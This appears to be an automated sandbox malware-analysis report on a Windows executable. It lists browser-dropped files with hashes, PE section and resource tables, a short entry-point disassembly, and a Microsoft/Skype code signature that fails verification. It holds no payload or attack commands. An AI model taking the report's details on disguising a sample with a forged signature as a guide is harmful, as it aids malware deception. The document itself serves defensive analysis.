                                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.983252933560686
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8jdUTYUT4HtidAKZdA19ehwiZUklqehs5y+3:82/mjy
                                                                                                                                                                                                                                                                                                  MD5:74974508ADB532D3B9C8160FAA1347BD
                                                                                                                                                                                                                                                                                                  SHA1:660307EEEBCB412AD27531E1B0BC384EB07603FE
                                                                                                                                                                                                                                                                                                  SHA-256:D03C7EACC51A9095C52678FFE363E02C1AA64044C0C212964F45FB47D22A70CD
                                                                                                                                                                                                                                                                                                  SHA-512:CA4AEDA93786CC3182DC18E60CF4397D2E1EA345C85E4D1653292C83E36387AD080E570A431C5820D91790F3C8F14EB7C60804A1815AB25E1290E88463EE8B14
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2679
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9972464447760996
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8UdUTYUT4HtidAKZdA1weh/iZUkAQkqehh5y+2:8j/k9Qey
                                                                                                                                                                                                                                                                                                  MD5:35593F57C642410C1479690BB5D06030
                                                                                                                                                                                                                                                                                                  SHA1:92232DF8D55F08D9CE148C98CCE2B589D932AFEB
                                                                                                                                                                                                                                                                                                  SHA-256:684647EF6B5315FC1E190A245B1924628DEAE512ED26F92CE462CFF1994E344E
                                                                                                                                                                                                                                                                                                  SHA-512:827AFFFDE2D68D97AA190ECD30272BBD407F59BCE0D3D038075456EB384F1249BD2B800B0E19FB77A929F7550AE93659FA40F945040990F98548D5C97075A40E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2693
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.008482332117183
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8x1dUTYUsHtidAKZdA14tseh7sFiZUkmgqeh7sf5y+BX:8xc/Un3y
                                                                                                                                                                                                                                                                                                  MD5:A481720C9BD68822CFD8B70A12EF7398
                                                                                                                                                                                                                                                                                                  SHA1:7367E2DC664B92719C898BBD83BC5EDE07F8A36B
                                                                                                                                                                                                                                                                                                  SHA-256:F014DC684B6729FE1F637856B09E048B4A61EAA62058186A0B1D07C9BB5D676B
                                                                                                                                                                                                                                                                                                  SHA-512:0B421332F7D765B2CCA282DD6112EB90A94550C06C5C84544CC777FF0E6B25B4744383EA2BE429237B9BE4383ED7581174F157C2BA3CE3F6F3F6B5AEA7809635
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9987998436559393
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8qdUTYUT4HtidAKZdA1vehDiZUkwqehl5y+R:81/v5y
                                                                                                                                                                                                                                                                                                  MD5:63215B3920B17BA6DEED7736D83C5DFE
                                                                                                                                                                                                                                                                                                  SHA1:72CCA642A15707216C2ADC8EE4A539A5F09017C6
                                                                                                                                                                                                                                                                                                  SHA-256:854E33FCA013F299DB0A95701C5C919C90D77628B019B29F022493FB1B277D84
                                                                                                                                                                                                                                                                                                  SHA-512:6D25BE698529FBC144D4FDA6DED078B2767D0E59E40E9E1FE300FCCF27AD2AE12B565382F80ED5446DE0AFDC076FDF715F62C7E9A393D06CFEB70EF0CD887EDA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.982640224212279
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8mdUTYUT4HtidAKZdA1hehBiZUk1W1qehb5y+C:8Z/P9ly
                                                                                                                                                                                                                                                                                                  MD5:7DAC980F1975BB6614BC716DF36C712A
                                                                                                                                                                                                                                                                                                  SHA1:6ADC679EA41F10C227A0410D6060AAC488DE7DDF
                                                                                                                                                                                                                                                                                                  SHA-256:227A1347072BE403E8C0E79057C17466BDDE0C41A0305DA49D909A0C7C8F38E0
                                                                                                                                                                                                                                                                                                  SHA-512:F23E2232A0CE9D1585ABE954AF8607266869C3B722DA6950650F5676B4768869211AD73A6C9886352C8D314268266C17ACF7BAF4542C6444EAC9FD26864DF2BA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2683
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9960629321131926
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8IdUTYUT4HtidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbd5y+yT+:8f/HT/TbxWOvTb3y7T
                                                                                                                                                                                                                                                                                                  MD5:3F06A35DCEEA084AAF96C4B6419AA32D
                                                                                                                                                                                                                                                                                                  SHA1:19B38FD0A8DDA35ADB2C4726C8995D7CBC21FD4A
                                                                                                                                                                                                                                                                                                  SHA-256:18B5F0B57F75464509283EB1A5090FA908419F2B9D0D4A09C3F190ADC96989E9
                                                                                                                                                                                                                                                                                                  SHA-512:0B2593A449DC07E891ED53F60E29FB98887DC9C8B05C2F79CC2AC8F1F5712B21852F84DF44B0C67A7284E63185DB70089CC184414468AE50DB9C186AD89DEDB9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3350)
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):3355
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.84499540652065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:hUliXIN6666VcEDRwtLO0dFcVuzb1tGtfXfffffX:hCZN6666VHDWA0dFT58
                                                                                                                                                                                                                                                                                                  MD5:C829B72FF99ED29900FFD4DF0FCEAD02
                                                                                                                                                                                                                                                                                                  SHA1:C4982EB9319F65305DDB0C75D4E6EF5B84AA228E
                                                                                                                                                                                                                                                                                                  SHA-256:328FDA34FCD4FAC7F4D539FCD4037ED5D4A1394A37D96AC0B43444348ACC4943
                                                                                                                                                                                                                                                                                                  SHA-512:F03C2A3F8FCFD230841C3AC234BCE06092F62E2813B7F58F01B8D8CDD36E5AC5F44E24F0E63854A5E929829201BCB3DD53AC930422FA457F9C67DC1CD36C49D1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):132723
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4365026127579865
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:f3kJQ7O4N5dTm+syHEt4W3XdQ4Q68uSr/nUW2i6o:fiQ7HTt/sHdQ4Q68DfUW8o
                                                                                                                                                                                                                                                                                                  MD5:0B394E7E5B70E98DE0B536DA9F079F06
                                                                                                                                                                                                                                                                                                  SHA1:1CDCE37F7D186C4E7651172592A0937EA3031E22
                                                                                                                                                                                                                                                                                                  SHA-256:7F7441711D16430C73E740B28392AE2A2E50079FEA3E2B15AEB9E1DE21124F13
                                                                                                                                                                                                                                                                                                  SHA-512:0C967757171A9955CBEC22DCFDE838861907AA1B6F7EAE01DAD883545ABF434EF2F2469165FE40A3451ABF41DA6978622B9126A901A873A55B65149F80539DB4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.965720773272215
                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                  File name:trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File size:1'146'198 bytes
                                                                                                                                                                                                                                                                                                  MD5:1b31c291993985499cf544cc549e9028
                                                                                                                                                                                                                                                                                                  SHA1:068d213d11e48f8dda5d90a96512b8101f29ad9e
                                                                                                                                                                                                                                                                                                  SHA256:f8615202ee1e9ccb7509f98c643b7bd6e01e439c57b78fd547cf96fd27ec5a47
                                                                                                                                                                                                                                                                                                  SHA512:e60267556172f46e5d59a44bd60edc2639b6b26282ebb5615099bbd0cb2a3d7429b66fda1a7d02fb17f00c898fe3d289b7adcf73d51f139f3d87cd7e34388302
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:whp0JbDs5hGLQlVGUUvJ5zYwe3H+2EEUsemRb3NpEWKj:kipohGLaGUU7zrm84jb37i
                                                                                                                                                                                                                                                                                                  TLSH:033533C2E6B06067DA8F1570A3719657AA3E7ABA3930C143A784DF8DB8653C1DA3434D
                                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                                  Icon Hash:6066ced2d0c4fc0c
                                                                                                                                                                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                                                                  Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                  Error Number:-2146869232
Not Before:24/04/2024 22:20:25
Not After:19/04/2025 22:20:25
                                                                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                                                                  • CN=Skype Software Sarl, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                                                                  Thumbprint MD5:DCACFC48C220E288EE97E70A6850405C
                                                                                                                                                                                                                                                                                                  Thumbprint SHA-1:F05F9F4EA0A299F5AD361A9F96D5D57DD3B17D8B
                                                                                                                                                                                                                                                                                                  Thumbprint SHA-256:1C2B9B164269689BB5348EAAF60345BF635B32FD61B0230420C8BE7F94B3C56B
                                                                                                                                                                                                                                                                                                  Serial:33000003DDA34EC21B604513590000000003DD
                                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                                  xor ebp, ebp
                                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                                                                                                                                  call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                  push 00000008h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                  call 00007F867528410Bh
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push 000002B4h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push 0040A264h
                                                                                                                                                                                                                                                                                                  call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                  push 0040A24Ch
                                                                                                                                                                                                                                                                                                  push 00476AA0h
                                                                                                                                                                                                                                                                                                  call 00007F8675283DEDh
                                                                                                                                                                                                                                                                                                  call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                                  call 00007F8675283DDBh
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                  mov eax, edi
                                                                                                                                                                                                                                                                                                  jne 00007F86752816DAh
                                                                                                                                                                                                                                                                                                  push 00000022h
                                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                                  mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  call 00007F8675283AB1h
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                  mov esi, eax
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                  jmp 00007F8675281763h
                                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                                                                                                  cmp ax, bx
                                                                                                                                                                                                                                                                                                  jne 00007F86752816DAh
                                                                                                                                                                                                                                                                                                  add esi, 02h
                                                                                                                                                                                                                                                                                                  cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                  • [LNK] VS2010 SP1 build 40219
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x4a556 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x115536 | 0x2820 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x100000 | 0x4a556 | 0x4a600 | 2ff988f1dc4ea0990d8600788102a18f | False | 0.9697741596638656 | data | 7.914062938625981 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x14b000 | 0xfd6 | 0x1000 | 3a08083c67cb0ea002559401e7766be1 | False | 0.59765625 | data | 5.576209654256569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x100280 | 0x3dd29 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9968999901273571 |
| RT_ICON | 0x13dfac | 0x62c6 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0006327612117378 |
| RT_ICON | 0x144274 | 0x213c | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0012929007992477 |
| RT_ICON | 0x1463b0 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.504780309194467 |
| RT_ICON | 0x148a18 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.5548724954462659 |
